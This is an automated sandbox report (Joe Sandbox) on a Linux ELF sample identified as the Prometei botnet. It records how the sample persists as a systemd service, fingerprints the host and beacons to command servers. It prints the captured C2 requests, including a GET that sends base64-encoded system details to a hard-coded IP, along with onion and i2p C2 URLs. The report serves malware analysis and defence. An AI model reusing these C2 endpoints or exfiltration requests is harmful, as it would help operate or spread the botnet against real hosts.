Create Interactive Tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:na.elf
Analysis ID:1653283
MD5:a602ed9fc13cf561bf74b56f8c1aa2ed
SHA1:5c1e779505480e4b67f45e89db0f7def9e88e204
SHA256:af20285f057974530228e55d6b18ea542b132d9a861805a8f174e9ebb808c831
Tags:elfuser-abuse_ch
Infos:

Detection

Prometei
Score:100
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Prometei
Drops files in suspicious directories
Executes the "dmidecode" command for reading DMI BIOS info like hardware or serial numbers (indicative of machine fingerprinting or VM-detection)
Found Tor onion address
Sample deletes itself
Sample is packed with UPX
Creates hidden files and/or directories
ELF contains segments with high entropy indicating compressed/encrypted content
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "pgrep" command search for and/or send signals to processes
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Executes the "uname" command used to read OS and architecture name
HTTP GET or POST without a user agent
Reads CPU information from /proc indicative of miner or evasive malware
Reads CPU information from /sys indicative of miner or evasive malware
Reads system information from the proc file system
Sample contains only a LOAD segment without any section mappings
Sample listens on a socket
Sample tries to set the executable flag
Suricata IDS alerts with low severity for network traffic
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1653283
Start date and time:2025-04-01 01:47:12 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 1s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:na.elf
Detection:MAL
Classification:mal100.troj.evad.linELF@0/13@2/0
  • VT rate limit hit for: http://152.36.128.18/cgi-bin/p.cgi?r=18&i=TO32433452U81Q0F
Command:/tmp/na.elf
PID:6233
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Starting...
System install...OK
Standard Error:Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.
  • system is lnxubuntu20
  • dash New Fork (PID: 6211, Parent: 4331)
  • rm (PID: 6211, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.ROSySM6ZUJ /tmp/tmp.PQ2NMYibax /tmp/tmp.YEeAFkFkYw
  • dash New Fork (PID: 6212, Parent: 4331)
  • cat (PID: 6212, Parent: 4331, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.ROSySM6ZUJ
  • dash New Fork (PID: 6213, Parent: 4331)
  • head (PID: 6213, Parent: 4331, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 6214, Parent: 4331)
  • tr (PID: 6214, Parent: 4331, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 6215, Parent: 4331)
  • cut (PID: 6215, Parent: 4331, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 6216, Parent: 4331)
  • cat (PID: 6216, Parent: 4331, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.ROSySM6ZUJ
  • dash New Fork (PID: 6217, Parent: 4331)
  • head (PID: 6217, Parent: 4331, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 6218, Parent: 4331)
  • tr (PID: 6218, Parent: 4331, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 6219, Parent: 4331)
  • cut (PID: 6219, Parent: 4331, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 6220, Parent: 4331)
  • rm (PID: 6220, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.ROSySM6ZUJ /tmp/tmp.PQ2NMYibax /tmp/tmp.YEeAFkFkYw
  • na.elf (PID: 6233, Parent: 6135, MD5: a602ed9fc13cf561bf74b56f8c1aa2ed) Arguments: /tmp/na.elf
    • na.elf New Fork (PID: 6236, Parent: 6233)
    • sh (PID: 6236, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep na.elf"
      • sh New Fork (PID: 6237, Parent: 6236)
      • pgrep (PID: 6237, Parent: 6236, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep na.elf
    • na.elf New Fork (PID: 6240, Parent: 6233)
    • sh (PID: 6240, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof na.elf"
      • sh New Fork (PID: 6241, Parent: 6240)
      • pidof (PID: 6241, Parent: 6240, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof na.elf
    • na.elf New Fork (PID: 6244, Parent: 6233)
    • sh (PID: 6244, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep uplugplay"
      • sh New Fork (PID: 6245, Parent: 6244)
      • pgrep (PID: 6245, Parent: 6244, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep uplugplay
    • na.elf New Fork (PID: 6250, Parent: 6233)
    • sh (PID: 6250, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep upnpsetup"
      • sh New Fork (PID: 6251, Parent: 6250)
      • pgrep (PID: 6251, Parent: 6250, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep upnpsetup
    • na.elf New Fork (PID: 6254, Parent: 6233)
    • sh (PID: 6254, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof upnpsetup"
      • sh New Fork (PID: 6255, Parent: 6254)
      • pidof (PID: 6255, Parent: 6254, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof upnpsetup
    • na.elf New Fork (PID: 6256, Parent: 6233)
    • sh (PID: 6256, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
      • sh New Fork (PID: 6257, Parent: 6256)
      • systemctl (PID: 6257, Parent: 6256, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • na.elf New Fork (PID: 6271, Parent: 6233)
    • sh (PID: 6271, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable uplugplay.service"
      • sh New Fork (PID: 6272, Parent: 6271)
      • systemctl (PID: 6272, Parent: 6271, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable uplugplay.service
    • na.elf New Fork (PID: 6278, Parent: 6233)
    • sh (PID: 6278, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start uplugplay.service"
      • sh New Fork (PID: 6279, Parent: 6278)
      • systemctl (PID: 6279, Parent: 6278, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start uplugplay.service
  • systemd New Fork (PID: 6259, Parent: 6258)
  • snapd-env-generator (PID: 6259, Parent: 6258, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6276, Parent: 6275)
  • snapd-env-generator (PID: 6276, Parent: 6275, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6280, Parent: 1)
  • uplugplay (PID: 6280, Parent: 1, MD5: a602ed9fc13cf561bf74b56f8c1aa2ed) Arguments: /usr/sbin/uplugplay
    • uplugplay New Fork (PID: 6282, Parent: 6280)
      • sh (PID: 6283, Parent: 6282, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/sbin/uplugplay -Dcomsvc"
        • sh New Fork (PID: 6284, Parent: 6283)
        • uplugplay (PID: 6284, Parent: 6283, MD5: a602ed9fc13cf561bf74b56f8c1aa2ed) Arguments: /usr/sbin/uplugplay -Dcomsvc
          • sh (PID: 6288, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl
            • sh New Fork (PID: 6289, Parent: 6288)
            • hostnamectl (PID: 6289, Parent: 6288, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl
          • sh (PID: 6294, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c hostnamectl
            • sh New Fork (PID: 6295, Parent: 6294)
            • hostnamectl (PID: 6295, Parent: 6294, MD5: b1245aa6d3c28b5d5fedb2d681d32eb9) Arguments: hostnamectl
          • sh (PID: 6437, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 6441, Parent: 6437)
            • dmidecode (PID: 6441, Parent: 6437, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 6440, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime
            • sh New Fork (PID: 6444, Parent: 6440)
            • uptime (PID: 6444, Parent: 6440, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime
          • sh (PID: 6447, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"
            • sh New Fork (PID: 6448, Parent: 6447)
            • uname (PID: 6448, Parent: 6447, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a
          • sh (PID: 6453, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 6454, Parent: 6453)
            • dmidecode (PID: 6454, Parent: 6453, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 6457, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 6458, Parent: 6457)
            • dmidecode (PID: 6458, Parent: 6457, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 6461, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c dmidecode
            • sh New Fork (PID: 6462, Parent: 6461)
            • dmidecode (PID: 6462, Parent: 6461, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode
          • sh (PID: 6471, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime
            • sh New Fork (PID: 6472, Parent: 6471)
            • uptime (PID: 6472, Parent: 6471, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime
          • sh (PID: 6475, Parent: 6284, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"
            • sh New Fork (PID: 6476, Parent: 6475)
            • uname (PID: 6476, Parent: 6475, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a
  • fwupd New Fork (PID: 6291, Parent: 1)
  • gpg (PID: 6291, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: /usr/bin/gpg --version
  • fwupd New Fork (PID: 6297, Parent: 1)
  • gpg (PID: 6297, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
  • systemd New Fork (PID: 6298, Parent: 1)
  • systemd-hostnamed (PID: 6298, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed
  • fwupd New Fork (PID: 6434, Parent: 1)
  • gpg (PID: 6434, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
  • fwupd New Fork (PID: 6443, Parent: 1)
  • gpg (PID: 6443, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
  • fwupd New Fork (PID: 6464, Parent: 1)
  • gpg (PID: 6464, Parent: 1, MD5: 3c2e7402cc788b3a878a1d2bea56afbf) Arguments: gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
  • cleanup
SourceRuleDescriptionAuthorStrings
na.elfLinux_Trojan_Dofloo_ac3333d1unknownunknown
  • 0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
SourceRuleDescriptionAuthorStrings
/usr/sbin/uplugplayLinux_Trojan_Dofloo_ac3333d1unknownunknown
  • 0x5bcdb:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
SourceRuleDescriptionAuthorStrings
6233.1.0000000000401000.00000000004f9000.r-x.sdmpLinux_Hacktool_Flooder_1a4eb229unknownunknown
  • 0x9beb:$a: F4 8B 45 E8 83 C0 01 89 45 F8 EB 0F 8B 45 E8 83 C0 01 89 45 F4 8B
6233.1.0000000000401000.00000000004f9000.r-x.sdmpLinux_Hacktool_Flooder_f454ec10unknownunknown
  • 0xb569:$a: 8B 45 EC 48 63 D0 48 8B 45 D0 48 01 D0 0F B6 00 3C 2E 75 4D 8B
6233.1.000000000052d000.0000000001575000.rw-.sdmpLinux_Trojan_Dofloo_ac3333d1unknownunknown
  • 0x7190db:$a: 76 77 78 95 5C C9 95 79 7A C9 95 5C C9 41 42 43 5C C9 95 5C 44 45
Process Memory Space: na.elf PID: 6233JoeSecurity_PrometeiYara detected PrometeiJoe Security
    Process Memory Space: na.elf PID: 6233JoeSecurity_Prometei_1Yara detected PrometeiJoe Security
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-04-01T01:50:09.133975+020020445601A Network Trojan was detected192.168.2.23396198.8.8.853UDP
      2025-04-01T01:50:09.248434+020020445601A Network Trojan was detected192.168.2.23428758.8.8.853UDP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-04-01T01:48:04.189583+020028033053Unknown Traffic192.168.2.2358304152.36.128.1880TCP
      2025-04-01T01:48:07.772289+020028033053Unknown Traffic192.168.2.2358306152.36.128.1880TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: na.elfAvira: detected
      Source: /usr/sbin/uplugplayAvira: detection malicious, Label: LINUX/GM.Agent.JQ
      Source: na.elfVirustotal: Detection: 36%Perma Link
      Source: na.elfReversingLabs: Detection: 47%

      Bitcoin Miner

      barindex
      Source: Yara matchFile source: Process Memory Space: na.elf PID: 6233, type: MEMORYSTR
      Source: /usr/sbin/uplugplay (PID: 6284)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
      Source: /usr/bin/pgrep (PID: 6237)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6245)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pgrep (PID: 6251)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/sbin/uplugplay (PID: 6284)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/uptime (PID: 6444)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/uptime (PID: 6472)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2044560 - Severity 1 - ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern : 192.168.2.23:42875 -> 8.8.8.8:53
      Source: Network trafficSuricata IDS: 2044560 - Severity 1 - ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern : 192.168.2.23:39619 -> 8.8.8.8:53
      Source: na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
      Source: na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: nNhttp://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi/usr/sbin/uplugplay/etc/uplugplay/etc/CommIdcrashed.dump/usr/sbin//etc/msdtcmsdtc2msdtc3/etc/pcc0/etc/pcc1pbdebug
      Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?r=18&i=TO32433452U81Q0F HTTP/1.0Host: 152.36.128.18
      Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KICYgYnVsbHNleWUvc2lkICYgDQoNCi91c3Ivc2Jpbi8NCiAxODo0ODowNiB1cCA3IG1pbiwgIDEgdXNlciwgIGxvYWQgYXZlcmFnZTogMS43NiwgMC44MSwgMC4zM3wxNzQzNDY0ODg2DQpMaW51eCBnYWxhc3NpYSA1LjQuMC03Mi1nZW5lcmljICM4MC1VYnVudHUgU01QIE1vbiBBcHIgMTIgMTc6MzU6MDAgVVRDIDIwMjEgeDg2XzY0IHg4Nl82NCB4ODZfNjQgR05VL0xpbnV4DQp9DQo_&i=TO32433452U81Q0F&h=galassia&enckey=eJjhO0mh02w9T30pl/WXlIUntj41tWS9rSR7xP768bszOdwRRk8sm99Gwb8p4fAUtFsaMrQdz8fJpgNa4ETYXWcBgFPqiTXmoGl+8qZO0fdsuRLffgksPZ8XKYaDpUN8YDBKiLMc17PTEoRT4C+3/J5LJGDBxK7Vu4yhIF//eDI= HTTP/1.0Host: 152.36.128.18
      Source: /usr/sbin/uplugplay (PID: 6284)Socket: 0.0.0.0:89Jump to behavior
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.23:58306 -> 152.36.128.18:80
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.23:58304 -> 152.36.128.18:80
      Source: unknownDNS traffic detected: query: xinchaodbcfda.com replaycode: Name error (3)
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
      Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: unknownTCP traffic detected without corresponding DNS query: 199.232.90.49
      Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?r=18&i=TO32433452U81Q0F HTTP/1.0Host: 152.36.128.18
      Source: global trafficHTTP traffic detected: GET /cgi-bin/p.cgi?add=aW5mbyB7DQp2NC4wMlZfVW5peDY0DQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCjMwNjQyOTYga0INCnZtd2FyZQ0KDQoNCg0KICYgYnVsbHNleWUvc2lkICYgDQoNCi91c3Ivc2Jpbi8NCiAxODo0ODowNiB1cCA3IG1pbiwgIDEgdXNlciwgIGxvYWQgYXZlcmFnZTogMS43NiwgMC44MSwgMC4zM3wxNzQzNDY0ODg2DQpMaW51eCBnYWxhc3NpYSA1LjQuMC03Mi1nZW5lcmljICM4MC1VYnVudHUgU01QIE1vbiBBcHIgMTIgMTc6MzU6MDAgVVRDIDIwMjEgeDg2XzY0IHg4Nl82NCB4ODZfNjQgR05VL0xpbnV4DQp9DQo_&i=TO32433452U81Q0F&h=galassia&enckey=eJjhO0mh02w9T30pl/WXlIUntj41tWS9rSR7xP768bszOdwRRk8sm99Gwb8p4fAUtFsaMrQdz8fJpgNa4ETYXWcBgFPqiTXmoGl+8qZO0fdsuRLffgksPZ8XKYaDpUN8YDBKiLMc17PTEoRT4C+3/J5LJGDBxK7Vu4yhIF//eDI= HTTP/1.0Host: 152.36.128.18
      Source: global trafficDNS traffic detected: DNS query: xinchaodbcfda.com
      Source: global trafficDNS traffic detected: DNS query: xinchaodbcfda.net
      Source: na.elf, uplugplay.32.drString found in binary or memory: http://152.36.128
      Source: na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://152.36.128.18/cgi-bin/p.cgi
      Source: na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.oni
      Source: na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://dummy.zero/cgi-bin/prometei.cgi
      Source: na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
      Source: na.elf, uplugplay.32.drString found in binary or memory: http://upx.sf.net
      Source: na.elf, 6233.1.000000000052d000.0000000001575000.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
      Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 55240 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55240
      Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

      System Summary

      barindex
      Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
      Source: 6233.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_1a4eb229 Author: unknown
      Source: 6233.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_f454ec10 Author: unknown
      Source: 6233.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORYMatched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
      Source: /usr/sbin/uplugplay, type: DROPPEDMatched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
      Source: LOAD without section mappingsProgram segment: 0x400000
      Source: na.elf, type: SAMPLEMatched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
      Source: 6233.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_1a4eb229 reference_sample = bf6f3ffaf94444a09b69cbd4c8c0224d7eb98eb41514bdc3f58c1fb90ac0e705, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = de076ef23c2669512efc00ddfe926ef04f8ad939061c69131a0ef9a743639371, id = 1a4eb229-a194-46a5-8e93-370a40ba999b, last_modified = 2021-09-16
      Source: 6233.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORYMatched rule: Linux_Hacktool_Flooder_f454ec10 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 0297e1ad6e180af85256a175183102776212d324a2ce0c4f32e8a44a2e2e9dad, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = 2ae5e2c3190a4ce5d238efdb10ac0520987425fb7af52246b6bf948abd0259da, id = f454ec10-7a67-4717-9e95-fecb7c357566, last_modified = 2022-01-26
      Source: 6233.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORYMatched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
      Source: /usr/sbin/uplugplay, type: DROPPEDMatched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
